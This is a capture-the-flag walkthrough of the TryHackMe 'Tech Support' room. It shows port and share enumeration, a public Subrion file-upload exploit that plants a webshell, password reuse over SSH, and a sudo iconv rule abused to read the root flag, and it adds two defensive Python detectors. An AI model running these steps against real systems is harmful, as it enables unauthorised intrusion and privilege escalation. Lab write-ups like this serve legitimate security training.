Tech Support TryHackMe Walkthrough
Challenge Link - https://tryhackme.com/room/techsupp0rt1
Initial Enumeration and Web Shell
We can start the initial enumeration by running a port scan using nmap to scan open ports and default scripts.
┌──(madhav㉿kali)-[~/ctf/thm/techSupport]
└─$ nmap -sC -sV -oN nmap/initial 10.10.59.1
Nmap scan report for 10.10.59.1
Host is up (0.19s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 10:8a:f5:72:d7:f9:7e:14:a5:c5:4f:9e:97:8b:3d:58 (RSA)
| 256 7f:10:f5:57:41:3c:71:db:b5:5b:db:75:c9:76:30:5c (ECDSA)
|_ 256 6b:4c:23:50:6f:36:00:7c:a6:7c:11:73:c1:a8:60:0c (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: TECHSUPPORT; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb2-time:
| date: 2022-05-16T17:28:34
|_ start_date: N/A
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: techsupport
| NetBIOS computer name: TECHSUPPORT\x00
| Domain name: \x00
| FQDN: techsupport
|_ System time: 2022-05-21T22:58:36+05:30
|_clock-skew: mean: -1h49m59s, deviation: 3h10m29s, median: 0s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed May 16 22:58:43 2022 -- 1 IP address (1 host up) scanned in 47.35 seconds
We have an SSH server running on port 22, an Apache httpd server running on port 80, and Samba smbd running on ports 139 and 445.
Let's start by enumerating port 80 first. The nmap scan shows that it is serving the Apache2 Ubuntu default page. Let's open our web browser and check it out.
Next, we can run a gobuster scan to look for hidden files and directories.
┌──(madhav㉿kali)-[~/ctf/thm/techSupport]
└─$ gobuster dir -u http://10.10.59.1 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.59.1
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/wordpress (Status: 301) [Size: 312] [--> http://10.10.59.1/wordpress/]
/test (Status: 301) [Size: 307] [--> http://10.10.59.1/test/]
===============================================================
Finished
===============================================================
We got two directories. I enumerated both of them, but there is nothing useful for us there. This is a rabbit hole, so don't fall for it.
Next, we can enumerate the SMB server and check whether there is any share that we can read or write.
┌──(madhav㉿kali)-[~/ctf/thm/techSupport]
└─$ smbclient -L 10.10.59.1
Password for [WORKGROUP\madhav]:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
websvr Disk
IPC$ IPC IPC Service (TechSupport server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP
We got a share named websvr. Let's try connecting to it.
┌──(madhav㉿kali)-[~/ctf/thm/techSupport]
└─$ smbclient //10.10.59.1/websvr
Password for [WORKGROUP\madhav]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat May 29 12:47:38 2021
.. D 0 Sat May 29 12:33:47 2021
enter.txt N 273 Sat May 29 12:47:38 2021
8460484 blocks of size 1024. 5698836 blocks available
smb: \> get enter.txt
getting file \enter.txt of size 273 as enter.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \> exit
We got a file named enter.txt. Inside the file, there are some credentials (which are encoded) and a reference to a directory named /subrion.
┌──(madhav㉿kali)-[~/ctf/thm/techSupport]
└─$ cat enter.txt
GOALS
=====
1)Make fake popup and host it online on Digital Ocean server
2)Fix subrion site, /subrion doesn't work, edit from panel
3)Edit wordpress website
IMP
===
Subrion creds
|->admin:7sKvntXdPEJaxazce9PXi24zaFrLiKWCk [cooked with magical formula]
Wordpress creds
|->
First of all, we need to decode the password. For this we can use CyberChef. This is a very simple encoding; it can be solved directly using CyberChef's Magic operation.
We got the password! If you try to access the /subrion directory, the page does not load properly, but we can access the /subrion/panel directory. This contains a login page, and we can log in using the credentials we got earlier.
For those who don't know about Subrion, it is an open-source CMS based on PHP and MySQL. Many exploits are publicly available for this CMS, including one for an authenticated file upload vulnerability.
We can use this exploit to get a reverse shell on the target machine.
┌──(madhav㉿kali)-[~/ctf/thm/techSupport]
└─$ python3 49876.py -u http://10.10.59.1/subrion/panel/ -l admin -p Scam2021
[+] SubrionCMS 4.2.1 - File Upload Bypass to RCE - CVE-2018-19422
[+] Trying to connect to: http://10.10.59.1/subrion/panel/
[+] Success!
[+] Got CSRF token: maQYr48N6TYYj96VUyXQnHJLa10YDXfBBE7C66Tk
[+] Trying to log in...
[+] Login Successful!
[+] Generating random name for Webshell...
[+] Generated webshell name: gbbogvvwtgreihg
[+] Trying to Upload Webshell..
[+] Upload Success... Webshell path: http://10.10.59.1/subrion/panel/uploads/gbbogvvwtgreihg.phar
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
You can also get this reverse shell manually, by uploading a php-reverse-shell with a .phar extension to /subrion/panel/uploads and then executing it.
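From the defender's side, the upload above leaves a clear trace: a request that executes a script out of a directory that should only ever serve static uploads. The following detection is my own added example, not code from the room or the original walkthrough; the log lines are constructed, and the upload path and extension list are assumptions based on what the walkthrough shows.

```python
import re

# Apache "combined" access-log format; we only need client IP, method, path and status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# Directory the walkthrough's webshell lands in, and extensions Apache's PHP handler
# will typically execute (.phar is the one the upload filter let through). Assumed values.
UPLOAD_DIR = "/subrion/panel/uploads/"
EXEC_EXTENSIONS = (".php", ".phar", ".phtml", ".php5")


def find_webshell_hits(log_text):
    """Return (ip, path) for every successful request that executes a script
    from the uploads directory, which should only ever serve static files."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format request line; skip it
        path = m.group("path").split("?", 1)[0].lower()  # ignore the query string
        if (path.startswith(UPLOAD_DIR)
                and path.endswith(EXEC_EXTENSIONS)
                and m.group("status") == "200"):
            hits.append((m.group("ip"), m.group("path")))
    return hits


# Constructed sample log lines modelled on the walkthrough's upload path.
SAMPLE_LOG = """\
10.10.14.5 - - [16/May/2022:22:58:40 +0530] "POST /subrion/panel/uploads/ HTTP/1.1" 200 512 "-" "python-requests/2.27.1"
10.10.14.5 - - [16/May/2022:22:58:41 +0530] "GET /subrion/panel/uploads/gbbogvvwtgreihg.phar?x=1 HTTP/1.1" 200 64 "-" "python-requests/2.27.1"
10.10.14.9 - - [16/May/2022:22:59:02 +0530] "GET /subrion/panel/uploads/logo.png HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.10.14.5 - - [16/May/2022:22:59:10 +0530] "GET /subrion/panel/uploads/old.php HTTP/1.1" 404 210 "-" "curl/7.81.0"
"""

if __name__ == "__main__":
    for ip, path in find_webshell_hits(SAMPLE_LOG):
        print(f"possible webshell execution from {ip}: {path}")
```

The fix on the server side is the usual one: serve the uploads directory with script execution disabled, so a stray .phar is just a download rather than code.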
Privilege Escalation
Now we have an initial shell on the target machine. Our next task is to elevate our privileges and finally get a root shell on the machine. To escalate our privileges, I started enumerating the web directories, and I found a password in wp-config.php.
$ cat /var/www/html/wordpress/wp-config.php
We can use this password to log in as the user scamsite (which can be found in /etc/passwd) using SSH.
┌──(madhav㉿kali)-[~/ctf/thm/techSupport]
└─$ ssh scamsite@10.10.59.1
The authenticity of host '10.10.59.1 (10.10.59.1)' can't be established.
ED25519 key fingerprint is SHA256:J/HR9GKX4ReRvs4I9fnMwmJrOTL5B3skZ4owxwxWoyM.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.59.1' (ED25519) to the list of known hosts.
scamsite@10.10.59.1's password:
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.4.0-186-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
120 packages can be updated.
88 updates are security updates.
Last login: Fri May 28 23:30:20 2021
scamsite@TechSupport:~$
Now, if we run the sudo -l command, we can see that the user scamsite can run the /usr/bin/iconv command as root.
scamsite@TechSupport:~$ sudo -l
Matching Defaults entries for scamsite on TechSupport:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User scamsite may run the following commands on TechSupport:
(ALL) NOPASSWD: /usr/bin/iconv
iconv is a Linux tool that converts text from one encoding to another. You can read more about it in the Linux man page. From GTFOBins, I found out that we can abuse the special sudo permission given to this tool to read the root flag.
We can do this with the following command:
scamsite@TechSupport:~$ sudo iconv -f 8859_1 -t 8859_1 "/root/root.txt"
**************************************** -
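The root cause here is a sudoers rule, not a bug in iconv: any binary that reads or writes files does the same thing once it runs as root without a password. As an added defensive check (my own code, not part of the room or the original walkthrough), this audits sudo -l output for that class of rule; the list of file-access binaries is an assumed shortlist, not the full GTFOBins catalogue.

```python
import re

# Sudo targets that let the caller read or write arbitrary files when run as root;
# iconv (the walkthrough's case) is one of them. Assumed shortlist, not exhaustive.
FILE_ACCESS_BINARIES = {"iconv", "cat", "less", "more", "tail", "head", "cp",
                        "mv", "tee", "dd", "vi", "vim", "nano", "find"}

# One rule line from `sudo -l`: "(runas) TAG: TAG: /path/cmd args, /other/cmd"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(output):
    """Return (runas_user, tags, command) for each rule in `sudo -l` output."""
    rules, in_rules = [], False
    for line in output.splitlines():
        if line.startswith("User ") and "may run the following commands" in line:
            in_rules = True          # rules follow this header line
            continue
        m = RULE_RE.match(line) if in_rules else None
        if not m:
            continue
        runas = m.group("runas").split(":")[0].strip()   # "(ALL : ALL)" -> "ALL"
        tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
        for cmd in m.group("cmds").split(","):
            if cmd.strip():
                rules.append((runas, tags, cmd.strip()))
    return rules


def risky_rules(output):
    """Flag rules that hand out root-level file access or skip the password."""
    findings = []
    for runas, tags, cmd in parse_sudo_l(output):
        binary = cmd.split()[0].rsplit("/", 1)[-1]       # "/usr/bin/iconv" -> "iconv"
        reasons = []
        if cmd == "ALL":
            reasons.append("unrestricted command")
        if "NOPASSWD" in tags:
            reasons.append("no password required")
        if runas in ("ALL", "root") and binary in FILE_ACCESS_BINARIES:
            reasons.append(f"{binary} can read or write arbitrary files as root")
        if reasons:
            findings.append((cmd, reasons))
    return findings


# Constructed copy of the walkthrough's `sudo -l` output (secure_path shortened).
SAMPLE = """\
Matching Defaults entries for scamsite on TechSupport:
    env_reset, mail_badpass, secure_path=/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User scamsite may run the following commands on TechSupport:
    (ALL) NOPASSWD: /usr/bin/iconv
"""
```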
The challenge is now complete. We managed to read the root flag! That’s it! Thanks for reading. Stay tuned for similar walkthroughs and much more coming up in the near future!
NOTE: The awesome artwork used in this article was created by Alfrey Davilla | vaneltia.